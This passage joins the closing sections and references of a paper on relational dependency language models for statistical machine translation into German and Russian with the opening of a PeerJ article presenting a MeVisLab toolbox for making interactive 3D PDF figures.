number of agree- ment violations is an indicator of better grammatical agreement. Table 6 shows the results. While the 5-gram NNLM reduces the number of agreement errors somewhat compared to the baseline (-18%), the reduction is greater for DLM (-34%) and RDLM (-46%). Neither the baseline nor the 5-gram NNLM 177 profits strongly from tuning on HWCMf , while the number of agreement errors is further reduced for the system with DLM (-41%) and RDLM (-54%). Adding the 5-gram NNLM to the RDLM system yields no further reduction on the number of agree- ment errors. Enforcing the agreement constraints on the base- line system (tuned on BLEU+HWCMf ) provides us with a gain of 0.3 in both BLEU and HWCMf ; on the RDLM system, only 0.03. The fact that the ben- efit of enforcing the agreement constraints drops off more sharply than the number of constraint viola- tions indicates that the remaining violations tend to be harder for the model to correct, e.g. because the translation model has not learned to produce the re- quired inflection of a word, or because some of the remaining violations are false positives. While the dependency language models’ effect of improving morphological agreement is not (fully) cumulative with the benefit from enforcing the unification con- straints formulated by Williams and Koehn (2011), our model has the advantage of being language- independent, learning from the data itself rather than relying on manually developed, grammar-specific constraints, and covering a wider range of phenom- ena such as subcategorisation and syntactic colloca- tions. The results confirm that the RDLM is more ef- fective at reducing morphological agreement errors than a similarly trained n-gram NNLM and the unla- belled DLM, and that adding HWCMf to the train- ing objective is beneficial. On a a meta-evaluation level, we compare the rank correlation between the automatic metrics and the numer of agreement er- rors with Kendall’s τ correlation, and observe that he number of agreement errors is more strongly (nega- tively) correlated with HWCMf (τ = −0.92) than with BLEU (τ = −0.77), METEOR (τ = −0.54) or TER (τ = 0.69). This supports our theoretical expectation that HWCMf is more sensitive to mor- phological agreement, which is enforced along syn- tactic n-grams, than n-gram metrics such as BLEU, or the unigram metric METEOR. 6 Related Work While there has been a wide range of dependency language models proposed (e.g. (Chelba et al., 1997; Quirk et al., 2004; Shen et al., 2010; Zhang, 2009; Popel and Marecek, 2010)), there are vast differ- ences in modelling assumptions. Our work is most similar to the dependency language model described in Shen et al. (2010), or the h-gram model proposed by Zhang (2009), both of which have been used for SMT. We make different modelling assumptions, relying less on configurational information, but in- cluding the prediction of dependency labels in the model. We argue that our relational modelling as- sumptions are more suitable for languages with a relatively free word order such as German. To a lesser extent, our work is similar to other parsing models that have been used for language modelling, such as lexicalized PCFGs (Charniak, 2001; Collins, 2003; Charniak et al., 2003), or struc- tured language models (Chelba and Jelinek, 2000); previous efforts to include them in the translation process failed to improve translation performance (Och et al., 2004; Post and Gildea, 2008). Differ- ences in our work that could explain why we see im- provements include the use of Neural Networks for training the model on the automatically parsed train- ing text, instead of re-using existing parser mod- els, which could be seen as a form of self-training (McClosky et al., 2006), and the integration of the language model into the decoder instead of n-best reranking. Also, there are major differences in the parsing models themselves. For instance, note that the structured LM by Chelba and Jelinek (2000) uses a binary branching structure, and that complex label sets would be required to encode subcategorisation frames in binary trees (Hockenmaier and Steedman, 2002). Our neural network is a standard feed-forward neural network as introduced by Bengio et al. (2003). Recently, recursive neural networks have been proposed for syntactic parsing (Socher et al., 2010; Le and Zuidema, 2014). The recursive na- ture of such models allows for the encoding of more context; for an efficient integration into the dynamic programming search of SMT decoding, we deem our model, which makes stronger Markov assump- tions, more suitable. While BLEU has been the standard objective func- tion for tuning the log-linear parameters in SMT sys- tems, recent work has investigated alternative objec- tive functions. Some authors concluded that none of 178 the tested alternatives could consistently outperform BLEU (Cer et al., 2010; Callison-Burch et al., 2011). Liu et al. (2011) report that tuning on the TESLA metric gives better results than tuning on BLEU; Lo et al. (2013) do the same for MEANT. There is related work on improving morpholog- ical agreement and subcategorisation through post- editing (Rosa et al., 2012) or independent models for inflection generation (Toutanova et al., 2008; Weller et al., 2013). The latter models initially pro- duce a stemmed translation, then predict the inflec- tion through feature-rich sequence models. Such a pipeline of prediction steps is less powerful than our joint prediction of stems and inflection. For in- stance, in example 2 in Table 4, our model chooses a different stem to match the subcategorisation frame of the translation; it is not possible to fix the baseline translation with inflection changes alone. 7 Conclusion The main contribution of this paper is the description of a relational dependency language model.10 We show that it is a valuable asset to a state-of-the-art SMT system by comparing perplexity values with other types of languages models, and by its integra- tion into decoding, which results in improvements according to automatic MT metrics and reduces the number of agreement errors. We show that the dis- fluencies that our model captures are qualitatively different from an n-gram Neural Network language model, with our model being more effective at mod- elling fluency phenomena along syntactic n-grams. A second important contribution is the optimiza- tion of the log-linear parameters of an SMT sys- tem based on syntactic n-grams. We are to our knowledge the first to tune an SMT system on a non-shallow syntactic similarity metric. Apart from showing improvements by tuning on HWCMf , our results also shed light on the interaction between models and tuning metrics. With n-gram language models, the choice of tuning metric only had a small effect on the English→German translation results. Only with dependency language models, which are able to model the syntactic n-grams that HWCM scores, did we see large improvements from adding 10We have released an implementation of RDLM and tuning on HWCMf as part of the Moses decoder. HWCMf to the objective function. On the one hand, this has implications when evaluating new model components: using an objective function that can- not capture the impact of a model component can result in false negatives because the model compo- nent will not receive an appropriate weight, and the model may thus seem to be of little use, even in a human evaluation. On the other hand, it is an im- portant finding for the evaluation of objective func- tions: the performance of an objective function is tied to the power of the underlying model. Without a model that is able to model syntactic n-grams, we might have concluded that HWCM is of little help as an objective function. Now, we hypothesize that HWCM is well-suited to optimize dependency lan- guage models because both operate on syntactic n- grams, just like BLEU and n-gram models are natu- ral counterparts. The approach we present is language- independent, and we evaluated it on SMT into German and Russian. While we have no empirical data on the model’s effectiveness for other target languages, we suspect that syntactic n-grams are especially suited for modelling and evaluating translations into languages with inter-dependencies between distant words and relatively free word order, such as German, Czech, or Russian. In this work, we relied on parse hypotheses being provided by a string-to-tree SMT decoder, but other settings are conceivable for future work, such as per- forming n-best string reranking by coupling the rela- tional dependency LM with a monolingual parse al- gorithm. Another obvious extension of the relational dependency LM is the inclusion of more context, for instance through larger windows for siblings and an- cestors, or source-context as in (Devlin et al., 2014). Also, we believe that the model can benefit from further advances in neural network modelling, for instance recent findings that ensembles of networks outperform a single network (Mikolov et al., 2011; Devlin et al., 2014) Acknowledgements I thank Bonnie Webber and the anonymous review- ers for their helpful suggestions and feedback. This research was funded by the Swiss National Science Foundation under grant P2ZHP1_148717. 179 References Satanjeev Banerjee and Alon Lavie. 2005. METEOR: An Automatic Metric for MT Evaluation with Im- proved Correlation with Human Judgments. In Pro- ceedings of the ACL Workshop on Intrinsic and Ex- trinsic Evaluation Measures for Machine Transla- tion and/or Summarization, pages 65–72, Ann Arbor, Michigan. Association for Computational Linguistics. Yoshua Bengio, Réjean Ducharme, Pascal Vincent, and Christian Janvin. 2003. A Neural Probabilistic Lan- guage Model. J. Mach. Learn. Res., 3:1137–1155, March. Ondrej Bojar, Christian Buck, Christian Federmann, Barry Haddow, Philipp Koehn, Johannes Leveling, Christof Monz, Pavel Pecina, Matt Post, Herve Saint- Amand, Radu Soricut, Lucia Specia, and Aleš Tam- chyna. 2014. Findings of the 2014 Workshop on Sta- tistical Machine Translation. In Proceedings of the Ninth Workshop on Statistical Machine Translation, pages 12–58, Baltimore, Maryland, USA. Association for Computational Linguistics. Chris Callison-Burch, Philipp Koehn, Christof Monz, and Omar Zaidan. 2011. Findings of the 2011 Work- shop on Statistical Machine Translation. In Proceed- ings of the Sixth Workshop on Statistical Machine Translation, pages 22–64, Edinburgh, Scotland. Asso- ciation for Computational Linguistics. Daniel Cer, Christopher D. Manning, and Daniel Juraf- sky. 2010. The Best Lexical Metric for Phrase-based Statistical MT System Optimization. In Human Lan- guage Technologies: The 2010 Annual Conference of the North American Chapter of the Association for Computational Linguistics, HLT ’10, pages 555–563, Los Angeles, California. Association for Computa- tional Linguistics. Eugene Charniak, Kevin Knight, and Kenji Yamada. 2003. Syntax-based language models for statistical machine translation. In MT Summit IX, New Orleans, USA. Eugene Charniak. 2001. Immediate-head Parsing for Language Models. In Proceedings of the 39th Annual Meeting on Association for Computational Linguis- tics, ACL ’01, pages 124–131. Association for Com- putational Linguistics. Ciprian Chelba and Frederick Jelinek. 2000. Structured language modeling. Computer Speech & Language, 14(4):283–332. Ciprian Chelba, David Engle, Frederick Jelinek, Vic- tor Jimenez, Sanjeev Khudanpur, Lidia Mangu, Harry Printz, Eric Ristad, Ronald Rosenfeld, Andreas Stol- cke, and Dekai Wu. 1997. Structure And Performance Of A Dependency Language Model. In Proceedings of Eurospeech, pages 2775–2778. Colin Cherry and George Foster. 2012. Batch Tuning Strategies for Statistical Machine Translation. In Pro- ceedings of the 2012 Conference of the North Amer- ican Chapter of the Association for Computational Linguistics: Human Language Technologies, NAACL HLT ’12, pages 427–436, Montreal, Canada. Associa- tion for Computational Linguistics. Jonathan H. Clark, Chris Dyer, Alon Lavie, and Noah A. Smith. 2011. Better Hypothesis Testing for Statistical Machine Translation: Controlling for Optimizer Insta- bility. In Proceedings of the 49th Annual Meeting of the Association for Computational Linguistics, pages 176–181, Portland, Oregon. Association for Computa- tional Linguistics. Michael Collins. 2003. Head-Driven Statistical Mod- els for Natural Language Parsing. Computational Lin- guistics, 29:589 – 637. Michael Denkowski and Alon Lavie. 2011. Meteor 1.3: Automatic Metric for Reliable Optimization and Evaluation of Machine Translation Systems. In Pro- ceedings of the Sixth Workshop on Statistical Machine Translation, pages 85–91, Edinburgh, Scotland. Asso- ciation for Computational Linguistics. Jacob Devlin, Rabih Zbib, Zhongqiang Huang, Thomas Lamar, Richard Schwartz, and John Makhoul. 2014. Fast and Robust Neural Network Joint Models for Sta- tistical Machine Translation. In Proceedings of the 52nd Annual Meeting of the Association for Compu- tational Linguistics (Volume 1: Long Papers), pages 1370–1380, Baltimore, Maryland. Association for Computational Linguistics. Julia Hockenmaier and Mark Steedman. 2002. Gen- erative Models for Statistical Parsing with Combina- tory Categorial Grammar. In Proceedings of the 40th Annual Meeting of the Association for Computational Linguistics, pages 335–342, Philadelphia, PA, USA. Philipp Koehn, Hieu Hoang, Alexandra Birch, Chris Callison-Burch, Marcello Federico, Nicola Bertoldi, Brooke Cowan, Wade Shen, Christine Moran, Richard Zens, Chris Dyer, Ondřej Bojar, Alexandra Con- stantin, and Evan Herbst. 2007. Moses: Open Source Toolkit for Statistical Machine Translation. In Pro- ceedings of the ACL-2007 Demo and Poster Sessions, pages 177–180, Prague, Czech Republic. Association for Computational Linguistics. Phong Le and Willem Zuidema. 2014. The Inside- Outside Recursive Neural Network model for Depen- dency Parsing. In Proceedings of the 2014 Conference on Empirical Methods in Natural Language Process- ing (EMNLP), pages 729–739, Doha, Qatar. Associa- tion for Computational Linguistics. Ding Liu and Daniel Gildea. 2005. Syntactic Features for Evaluation of Machine Translation. In Proceed- ings of the ACL Workshop on Intrinsic and Extrinsic 180 Evaluation Measures for Machine Translation and/or Summarization, pages 25–32, Ann Arbor, Michigan. Chang Liu, Daniel Dahlmeier, and Hwee Tou Ng. 2011. Better Evaluation Metrics Lead to Better Machine Translation. In Proceedings of the 2011 Conference on Empirical Methods in Natural Language Process- ing, pages 375–384, Edinburgh, UK. Chi-kiu Lo, Meriem Beloucif, and Dekai Wu. 2013. Im- proving machine translation into Chinese by tuning against Chinese MEANT. In 10th International Work- shop on Spoken Language Translation (IWSLT 2013), Heidelberg, Germany. David McClosky, Eugene Charniak, and Mark Johnson. 2006. Effective Self-training for Parsing. In Pro- ceedings of the Main Conference on Human Language Technology Conference of the North American Chap- ter of the Association of Computational Linguistics, HLT-NAACL ’06, pages 152–159, New York. Asso- ciation for Computational Linguistics. Tomas Mikolov, Stefan Kombrink, Lukas Burget, Jan Cernocký, and Sanjeev Khudanpur. 2011. Exten- sions of recurrent neural network language model. In Proceedings of the IEEE International Conference on Acoustics, Speech, and Signal Processing, ICASSP 2011, pages 5528–5531, Prague, Czech Republic. Joakim Nivre, Johan Hall, and Jens Nilsson. 2006. Malt- Parser: A Data-Driven Parser-Generator for Depen- dency Parsing. In Proceedings of the 5th International Conference on Language Resources and Evaluation (LREC 2006), pages 2216 –2219, Genoa, Italy. Franz Josef Och, Daniel Gildea, Sanjeev Khudanpur, Anoop Sarkar, Kenji Yamada, Alex Fraser, Shankar Kumar, Libin Shen, David Smith, Katherine Eng, Viren Jain, Zhen Jin, and Dragomir Radev. 2004. A Smorgasbord of Features for Statistical Machine Translation. In Proceedings of the Main Conference on Human Language Technology Conference of the North American Chapter of the Association of Com- putational Linguistics, pages 161–168, Boston, Mas- sachusetts, USA. Association for Computational Lin- guistics. Kishore Papineni, Salim Roukos, Todd Ward, and Wei- Jing Zhu. 2002. BLEU: A Method for Automatic Evaluation of Machine Translation. In Proceedings of the 40th Annual Meeting on Association for Compu- tational Linguistics, pages 311–318, Philadelphia, PA. Association for Computational Linguistics. Jan-Thorsten Peter, Matthias Huck, Hermann Ney, and Daniel Stein. 2012. Soft String-to-Dependency Hierarchical Machine Translation. In Informatik- tage der Gesellschaft für Informatik, Lecture Notes in Informatics (LNI), pages 59–62, Bonn, Germany. Gesellschaft für Informatik. Martin Popel and David Marecek. 2010. Perplexity of n-Gram and Dependency Language Models. In Petr Sojka, Ales Horák, Ivan Kopecek, and Karel Pala, edi- tors, TSD, volume 6231 of Lecture Notes in Computer Science, pages 173–180. Springer. Matt Post and Daniel Gildea. 2008. Parsers as language models for statistical machine translation. In Proceed- ings of the Eighth Conference of the Association for Machine Translation in the Americas. Chris Quirk, Arul Menezes, and Colin Cherry. 2004. Dependency Tree Translation: Syntactically Informed Phrasal SMT. Technical Report MSR-TR-2004-113, Microsoft Research. Rudolf Rosa, David Mareček, and Ondřej Dušek. 2012. DEPFIX: A System for Automatic Correction of Czech MT Outputs. In Proceedings of the Seventh Workshop on Statistical Machine Translation, WMT ’12, pages 362–368, Montreal, Canada. Association for Computational Linguistics. Rico Sennrich, Martin Volk, and Gerold Schneider. 2013. Exploiting Synergies Between Open Resources for German Dependency Parsing, POS-tagging, and Mor- phological Analysis. In Proceedings of the Interna- tional Conference Recent Advances in Natural Lan- guage Processing 2013, pages 601–609, Hissar, Bul- garia. Rico Sennrich. 2014. A CYK+ Variant for SCFG Decod- ing Without a Dot Chart. In Proceedings of SSST-8, Eighth Workshop on Syntax, Semantics and Structure in Statistical Translation, pages 94–102, Doha, Qatar, October. Association for Computational Linguistics. Serge Sharoff and Joakim Nivre. 2011. The proper place of men and machines in language technology. Process- ing Russian without any linguistic knowledge. In Pro- ceedings of the International Conference on Compu- tational Linguistics and Artificial Intelligence Dialog 2011. Libin Shen, Jinxi Xu, and Ralph Weischedel. 2010. String-to-dependency Statistical Machine Translation. Comput. Linguist., 36(4):649–671. Grigori Sidorov, Francisco Velasquez, Efstathios Sta- matatos, Alexander Gelbukh, and Liliana Chanona- Hernández. 2013. Syntactic Dependency-based N- grams As Classification Features. In Proceedings of the 11th Mexican International Conference on Ad- vances in Computational Intelligence - Volume Part II, MICAI’12, pages 1–11, Berlin, Heidelberg. Springer- Verlag. Matthew Snover, Bonnie Dorr, Richard Schwartz, Lin- nea Micciulla, and John Makhoul. 2006. A study of translation edit rate with targeted human annotation. In Proceedings of Association for Machine Translation in the Americas, pages 223–231. 181 Richard Socher, Christopher D. Manning, and Andrew Y. Ng. 2010. Learning Continuous Phrase Represen- tations and Syntactic Parsing with Recursive Neural Networks. Proceedings of the Deep Learning and Un- supervised Feature Learning Workshop of NIPS 2010, pages 1–9. Andreas Stolcke. 2002. SRILM – An Extensible Lan- guage Modeling Toolkit. In Seventh International Conference on Spoken Language Processing, pages 901–904, Denver, Colorado, USA. Kristina Toutanova, Hisami Suzuki, and Achim Ruopp. 2008. Applying Morphology Generation Models to Machine Translation. In Proceedings of the 45th An- nual Meeting of the Association for Computational Linguistics. Reut Tsarfaty, Khalil Sima’an, and Remko Scha. 2009. An Alternative to Head-Driven Approaches for Pars- ing a (Relatively) Free Word-Order Language. In Pro- ceedings of the 2009 Conference on Empirical Meth- ods in Natural Language Processing, pages 842–851, Singapore. Reut Tsarfaty. 2010. Relational-Realizational Parsing. Ph.D. thesis, University of Amsterdam. Ashish Vaswani, Yinggong Zhao, Victoria Fossum, and David Chiang. 2013. Decoding with Large-Scale Neural Language Models Improves Translation. In Proceedings of the 2013 Conference on Empirical Methods in Natural Language Processing, EMNLP 2013, pages 1387–1392, Seattle, Washington, USA. Marion Weller, Alexander Fraser, and Sabine Schulte im Walde. 2013. Using subcategorization knowledge to improve case prediction for translation to German. In Proceedings of the 51st Annual Meeting of the Associ- ation for Computational Linguistics, pages 593–603, Sofia, Bulgaria. Association for Computational Lin- guistics. Philip Williams and Philipp Koehn. 2011. Agreement Constraints for Statistical Machine Translation into German. In Proceedings of the Sixth Workshop on Statistical Machine Translation, pages 217–226, Ed- inburgh, UK. Association for Computational Linguis- tics. Philip Williams, Rico Sennrich, Maria Nadejde, Matthias Huck, Eva Hasler, and Philipp Koehn. 2014. Ed- inburgh’s Syntax-Based Systems at WMT 2014. In Proceedings of the Ninth Workshop on Statistical Ma- chine Translation, pages 207–214, Baltimore, Mary- land, USA. Association for Computational Linguis- tics. Joy Ying Zhang. 2009. Structured Language Models for Statistical Machine Translation. Ph.D. thesis, Johns Hopkins University. 182 work_cxe3a2zmnnge5ojw7lp3ztifam ---- Submitted 26 February 2016 Accepted 8 May 2016 Published 20 June 2016 Corresponding author Axel Newe, axel.newe@fau.de Academic editor Jingbo Wang Additional Information and Declarations can be found on page 17 DOI 10.7717/peerj-cs.64 Copyright 2016 Newe Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Enriching scientific publications with interactive 3D PDF: an integrated toolbox for creating ready-to-publish figures Axel Newe Medical Applications Team, Method Park Engineering GmbH, Erlangen, Germany Chair of Medical Informatics, Friedrich-Alexander Universität Erlangen-Nürnberg, Erlangen, Germany ABSTRACT Three-dimensional (3D) data of many kinds is produced at an increasing rate throughout all scientific disciplines. The Portable Document Format (PDF) is the de-facto standard for the exchange of electronic documents and allows for embedding three-dimensional models. Therefore, it is a well-suited medium for the visualization and the publication of this kind of data. The generation of the appropriate files has been cumbersome so far. This article presents the first release of a software toolbox which integrates the complete workflow for generating 3D model files and ready-to-publish 3D PDF documents for scholarly publications in a consolidated working environment. It can be used out-of-the-box as a simple working tool or as a basis for specifically tailored solutions. A comprehensive documentation, an example project and a project wizard facilitate the customization. It is available royalty-free and for Windows, MacOS and Linux. Subjects Computer Vision, Data Science, Digital Libraries, Emerging Technologies, Scientific Computing and Simulation Keywords Portable Document Format, 3D-PDF, PDF, U3D, Universal 3D, Application INTRODUCTION Throughout many scientific disciplines, the availability—and thus the importance—of three-dimensional (3D) data has grown in the recent years. Consequently, this data is often the basis for scientific publications, and in order to avoid a loss of information, the visualization of this data should be 3D whenever possible (Tory & Möller, 2004). In contrary to that, almost all contemporary visualization means (paper printouts, computer screens, etc.) only provide a two-dimensional (2D) interface. The most common workaround for this limitation is to project the 3D data onto the available 2D plane (Newe, 2015), which results in the so-called ‘‘2.5D visualization’’ (Tory & Möller, 2004). This projection yields two main problems: limited depth perception and objects that occlude each other. A simple but effective solution of these problems is interaction: by changing the projection angle of a 2.5D visualization (i.e., by changing the point of view), depth perception is improved (Tory & Möller, 2004), and at the same time objects that had previously been occluded (e.g., the backside) can be brought to sight. A means of application of this simple solution has been available for many years: the Portable Document Format (PDF) from Adobe (Adobe, 2014). This file format is the How to cite this article Newe (2016), Enriching scientific publications with interactive 3D PDF: an integrated toolbox for creating ready- to-publish figures. PeerJ Comput. Sci. 2:e64; DOI 10.7717/peerj-cs.64 https://peerj.com mailto:axel.newe@fau.de https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.64 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://dx.doi.org/10.7717/peerj-cs.64 de-facto standard for the exchange of electronic documents and almost every scientific article that is published nowadays is available as PDF—as well as even articles of the middle of the last century (Hugh-Jones, 1955). PDF allows for embedding 3D models and the Adobe Reader (http://get.adobe.com/reader/otherversions/) can be used to display these models interactively. Nevertheless, this technology seems not to have found broad acceptance among the scientific community until now, although journals encourage authors to use this technology (Maunsell, 2010; Elsevier, 2015). One reason might be that the creation of the appropriate model files and of the final PDF documents is still cumbersome. Not everything that is technically possible is accepted by those who are expected to embrace the innovation if the application of this innovation is hampered by inconveniences (Hurd, 2000). Generally suitable protocols and procedures have been proposed by a number of authors before, but they all required a toolchain of at least three (Kumar et al., 2010; Danz & Katsaros, 2011) or even four (Phelps, Naeger & Marcovici, 2012; Lautenschlager, 2014) different software applications and up to 22 single steps until the final PDF was created. Furthermore, some of the proposed workflows were limited to a certain operating system (OS) (Phelps, Naeger & Marcovici, 2012), required programming skills (Barnes et al., 2013) or relied on commercial software (Ruthensteiner & Heß, 2008). Especially the latter might be an important limiting factor which hampers the proliferation of the 3D PDF format in scientific publishing (Lautenschlager, 2014; Newe, 2015). This article presents a comprehensive and highly integrated software tool for the creation of both the 3D model files (which can be embedded into PDF documents) and the final, ready-to-publish PDF documents with embedded interactive 3D figures. The presented solution is based on MeVisLab, available for all major operating systems (Windows, MacOS and Linux) and requires no commercial license. The source code is available but does not necessarily need to be compiled since binary add-on installers for all platforms are available. A detailed online documentation, an example project and an integrated wizard facilitate re-use and customization. BACKGROUND AND RELATED WORK The Portable Document Format The Portable Document Format is a document description standard for the definition of electronic documents independent of the software, the hardware or the operating system that is used for creating or consuming (displaying, printing...) it (Adobe, 2008a). A PDF file can comprise all necessary information and all resources to completely describe the layout and the content of an electronic document, including texts, fonts, images and multimedia elements like audio, movies or 3D models. Therefore, it fulfils all requirements for an interactive publication document as proposed by Thoma et al., (2010). Although it is an ISO standard (ISO 32000-1:2008 (ISO, 2008)), the specification is available to the full extent from the original developer Adobe (Adobe, 2015) and can be used royalty-free. Newe (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.64 2/20 https://peerj.com http://get.adobe.com/reader/otherversions/ http://dx.doi.org/10.7717/peerj-cs.64 Table 1 Number of publications related to 3D PDFs in biomedical sciences since 2008 (not compre- hensive). Year Number of publications with embedded/supplemental 3D PDF Number of publications dealing with/mentioning 3D PDF 2005 – 1 2008 1 – 2009 5 4 2010 2 7 2011 7 6 2012 6 5 2013 7 2 2014 21 7 2015 31 2 Embedding 3D models into PDF The fifth edition of the PDF specification (PDF version 1.6 (Adobe, 2004)), published in 2004, was the first to support so-called ‘‘3D Artwork’’ as an embedded multimedia feature. In January 2005, the Acrobat 7 product family provided the first implementation of tools for creating and displaying these 3D models (Adobe, 2005). The latest version (PDF version 1.7 (Adobe, 2008a)) supports three types of geometry (meshes, polylines and point clouds), textures, animations, 15 render modes, 11 lighting schemes and several other features. The only 3D file format that is supported by the ISO standard (ISO, 2008) is Universal 3D (U3D, see section below). Support for another 3D format (Product Representation Compact, PRC) has been added by Adobe (Adobe, 2008b) and has been proposed to be integrated into the replacement Norm ISO 32000-2 (PDF 2.0). However, this new standard is currently only available as draft version (ISO, 2014) and has not yet been adopted. Although the first application in scientific context was proposed in November 2005 (Zlatanova & Verbree, 2005) and thus quite soon after this new technology was available, it took three more years before the first applications were really demonstrated in scholarly articles (Ruthensteiner & Heß, 2008; Kumar et al., 2008; Barnes & Fluke, 2008 ). Since then, the number of publications that apply PDF 3D technology either in theory or in practice has increased almost every year (Table 1). The most sophisticated implementation so far is the reporting of planning results for liver surgery where the PDF roots are hidden behind a user interface which emulates a stand-alone software application (Newe, Becker & Schenk, 2014). The Universal 3D (U3D) file format As outlined above, the U3D file format is the only 3D format that is supported by the current ISO specification of PDF. Initially designed as an exchange format for Computer Aided Construction (CAD), it was later standardized by ECMA International (formerly known as European Computer Manufacturers Association, ECMA) as ECMA-363 (Universal 3D File Format). The latest version is the 4th edition from June 2007 (ECMA, 2007). Newe (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.64 3/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.64 U3D is a binary file format that comprises all information to describe a 3D scene graph. A U3D scene consists of an arbitrary number of objects that can be sorted in an object tree. The geometry of each object can be defined as a triangular mesh, a set of lines or a set of points. A proprietary bit encoding algorithm allows for a highly compressed storage of the geometry data. A number of additional features and entities (textures, lighting, views, animations) can be defined; details are described in previously published articles (Newe & Ganslandt, 2013). The scholarly publishing company Elsevier invites authors to supplement their articles with 3D models in U3D format (Elsevier, 2015) and many 3D software tools provide the possibility to export in U3D format. However, most of them are commercial software, but open source solutions like MeshLab (http://meshlab.sourceforge.net/) are available as well. Creating 3D model files and PDF documents Although many tools and libraries are available that support the creation of 3D model files and of final PDF documents, the whole process is still cumbersome. The problems are manifold: some tools require programming skills; some do not support features those are of interest for scientific 3D data (like polylines (Newe, 2015) and point clouds Barnes & Fluke, 2008). Operating system platform support is another issue, as well as royalty-free use. As regards the creation of the 3D model files, most of these problems have been addressed in a previous article (Newe, 2015). The main problem, however, remains the creation of the final PDFs. Specifying the content and (in particular) the layout of a document can be a complex task and is usually the domain of highly specialized word processor software. Figures and supplements for scholarly publications, on the other hand, usually have a specific layout where only the contents of (a limited number of) pre-defined elements vary. There are at least three common elements for a scientific figure: the figure itself, a short caption text and a longer descriptive text. If the figure is intended to be provided as supplemental information file instead of being integrated into the main article text, some additional information is necessary as well: at least a general headline and an optional reference to the main article should be provided. If the document content is modularized to these five key elements (Fig. 1), the creation of the PDF itself becomes a rather simple task, because the layout can be pre-defined. One last difficulty arises from a peculiarity of interactive 3D figures in PDF: the number viewing options (e.g., camera angle, zoom, lighting...) is nearly unlimited. Although such a figure is intended to provide all these options, an author usually wants to define an initial view at the objects, if only to simply ensure that all objects are visible. No freely available tool for PDF creation currently provides a feature to pre-define such a view. The movie15 package for LaTeX (Grahn, 2005) provides a mechanism do determine the view parameters, but that requires the generation of intermediate PDFs. Finally it must be mentioned that many previously published 3D models are very large—sometimes up to nearly 100 megabytes (Krause et al., 2014). In most cases, this size could (and should) be reduced significantly, because the density of polygon meshes does usually not need to be very high for illustrative purposes. Newe (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.64 4/20 https://peerj.com http://meshlab.sourceforge.net/ http://dx.doi.org/10.7717/peerj-cs.64 Figure 1 General layout of a scholarly figure if provided as supplemental material MeVisLab MeVisLab is a framework for image processing and an environment for visual development, published by MeVis Medical Solutions AG and Fraunhofer MEVIS in Bremen, Germany. It is available via download (http://www.mevislab.de/download/) for all major platforms (Microsoft Windows, Mac OS and Linux) and has a licensing option which is free for use in non-commercial organizations and research (‘‘MeVisLab SDK Unregistered’’ license, http://www.mevislab.de/mevislab/versions-and-licensing/). Beside the development features, MeVisLab can be used as a framework for creating sophisticated applications with graphical user interfaces that hide the underlying platform and that can simply be used without any programming knowledge (Koenig et al., 2006; Heckel, Schwier & Peitgen, 2009; Ritter et al., 2011). MeVisLab has been evaluated as a very good platform for creating application prototypes (Bitter et al., 2007), is very Newe (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.64 5/20 https://peerj.com http://www.mevislab.de/download/ http://www.mevislab.de/mevislab/versions-and-licensing/ http://dx.doi.org/10.7717/peerj-cs.64 well documented (http://www.mevislab.de/developer/documentation/) and supported by an active online community (http://www.mevislab.de/developer/community/; https://github.com/MeVisLab/communitymodules/tree/master/Community). All algorithms and functions included into MeVisLab are represented and accessed by ‘‘modules,’’ which can be arranged and connected to image processing networks or data processing networks on a graphical user interface (GUI) following the visual data-flow development paradigm. By means of so-called ‘‘macro modules,’’ these networks can then be converted with little effort into complete applications with an own GUI. METHODS Elicitation of requirements As described above, the generation of the necessary 3D model data and particularly of the final PDF is still subject to a number of difficulties. Therefore, the first step was the creation of a list of requirement specifications with the aim to create a tool that overcomes these known drawbacks. Two requirements have been identified to be the most important ones: (1) the demand for a tool that creates ‘‘ready-to-publish’’ PDF documents without the need for commercial software and (2) the integration of all necessary steps into a single and easy-to-use interface. Beside these two main requirements, a number of additional requirements have then been identified as well. See Table 2 for a full list of all requirements that were the basis for the following development. Creation of an “App” for MeVisLab MeVisLab-based solutions presented in previous work (Newe & Ganslandt, 2013; Newe, 2015 ) already provide the possibility to create U3D files without requiring programming skills and without the need for an intensive training. However, they still needed some basic training as regards assembling the necessary processing chains in MeVisLab. Furthermore, the creation of the final PDF was not possible so far. Therefore, a new macro module was created for MeVisLab. A macro module encapsulates complex processing networks and can provide an integrated user interface. In this way, the internal processes can be hidden away from the user, who can focus on a streamlined workflow instead. Designed in an appropriate way, a macro module can also be considered as an ‘‘app’’ inside of MeVisLab. In order to provide the necessary functionality, some auxiliary tool modules (e.g., for the creation of the actual PDF file) needed to be developed as well. Along with the modules for U3D export mentioned above, these auxiliary tool modules were integrated into the internal processing network of the main ‘‘app’’ macro. The technical details of these internal modules are not within the scope of this article. However, the source code is available and interested readers are free to explore the code and to use it for own projects. The user interface of the app was designed in a way that it guides novice users step-by-step without treating experienced users too condescendingly, though. Finally, a comprehensive documentation including an example project, a wizard for creating tailored PDF modules and a verbose help text was set up. Newe (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.64 6/20 https://peerj.com http://www.mevislab.de/developer/documentation/ http://www.mevislab.de/developer/community/ https://github.com/MeVisLab/communitymodules/tree/master/Community http://dx.doi.org/10.7717/peerj-cs.64 Table 2 Requirements for the development of the software tool. The two main requirements are high- lighted in bold font. ID Requirement specification R1 The software shall create ready-to-publish PDF documents with embedded 3D models. R1.1 The software shall offer an option to specify the activation mode and the deactivation mode for the 3D models. R2 The software shall provide an integrated, single-window user interface that comprises all necessary steps. R3 The software shall be executable under Windows, MacOS and at least one Linux distribution. R4 The software shall be executable without the need to purchase a commerical license. R5 The software shall create 3D model files in U3D format. R5.1 The software shall create view definitions for the 3D model. R5.2 The software shall create poster images for the PDF document. R6 The software shall import mesh geometry from files in OBJ, STL and PLY format. R6.1 The software should import mesh geometry from other file formats as well. R6.2 The software shall offer an option to reduce the number of triangles of imported meshes. R6.3 The software shall offer an option to specify the U3D object name and the color of imported meshes. R7 The software shall import line set geometry from files in text format. R7.1 The software shall offer an option to specify the U3D object name and the color of imported line sets. R8 The software shall import point set geometry from files in text format. R8.1 